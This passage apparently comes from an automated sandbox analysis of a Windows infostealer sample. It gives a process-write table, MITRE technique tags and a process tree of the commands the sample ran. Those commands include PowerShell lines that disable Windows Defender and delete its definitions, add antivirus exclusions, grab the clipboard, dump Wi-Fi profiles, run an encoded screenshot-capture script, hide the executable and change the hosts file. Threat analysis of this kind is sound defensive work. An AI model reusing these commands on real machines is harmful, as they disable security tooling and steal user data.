PID 2640 wrote to memory of 2980	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	99
PID 2980 wrote to memory of 2156	2980	cmd.exe	101
PID 2980 wrote to memory of 2156	2980	cmd.exe	101
PID 2980 wrote to memory of 2156	2980	cmd.exe	101
PID 2640 wrote to memory of 3112	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	102
PID 2640 wrote to memory of 3112	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	102
PID 2640 wrote to memory of 3112	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	102
PID 3112 wrote to memory of 4984	3112	cmd.exe	104
PID 3112 wrote to memory of 4984	3112	cmd.exe	104
PID 3112 wrote to memory of 4984	3112	cmd.exe	104
PID 2640 wrote to memory of 1252	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	105
PID 2640 wrote to memory of 1252	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	105
PID 2640 wrote to memory of 1252	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	105
PID 1252 wrote to memory of 3540	1252	cmd.exe	204
PID 1252 wrote to memory of 3540	1252	cmd.exe	204
PID 1252 wrote to memory of 3540	1252	cmd.exe	204
PID 2640 wrote to memory of 4160	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	108
PID 2640 wrote to memory of 4160	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	108
PID 2640 wrote to memory of 4160	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	108
PID 4160 wrote to memory of 4656	4160	cmd.exe	110
PID 4160 wrote to memory of 4656	4160	cmd.exe	110
PID 4160 wrote to memory of 4656	4160	cmd.exe	110
PID 2640 wrote to memory of 5064	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	111
PID 2640 wrote to memory of 5064	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	111
PID 2640 wrote to memory of 5064	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	111
PID 2640 wrote to memory of 1212	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	112
PID 2640 wrote to memory of 1212	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	112
PID 2640 wrote to memory of 1212	2640	6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe	112
PID 5064 wrote to memory of 3776	5064	cmd.exe	115

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3776	attrib.exe
1904	attrib.exe
3996	attrib.exe

C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
"C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3972
- C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
  "C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2024
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4988
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()""
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"
      4⤵
      System Location Discovery: System Language Discovery
      PID:32
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3932
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4820
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3112
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1252
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4160
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:5064
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1212
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2248
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:2588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2180
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:3620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1812
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      System Location Discovery: System Language Discovery
      PID:3208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1924
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:548
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:2776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1888
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:392
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1800
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      System Location Discovery: System Language Discovery
      Gathers system information
      PID:3344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1336
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      System Location Discovery: System Language Discovery
      PID:4688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3672
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4620
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rmtpdmlm\rmtpdmlm.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4412
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B46.tmp" "c:\Users\Admin\AppData\Local\Temp\rmtpdmlm\CSC7679762E431545D99BE718D267B71F6.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1184
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:3008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3124
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4612
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3980
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:740
  - - C:\Windows\SysWOW64\tree.com
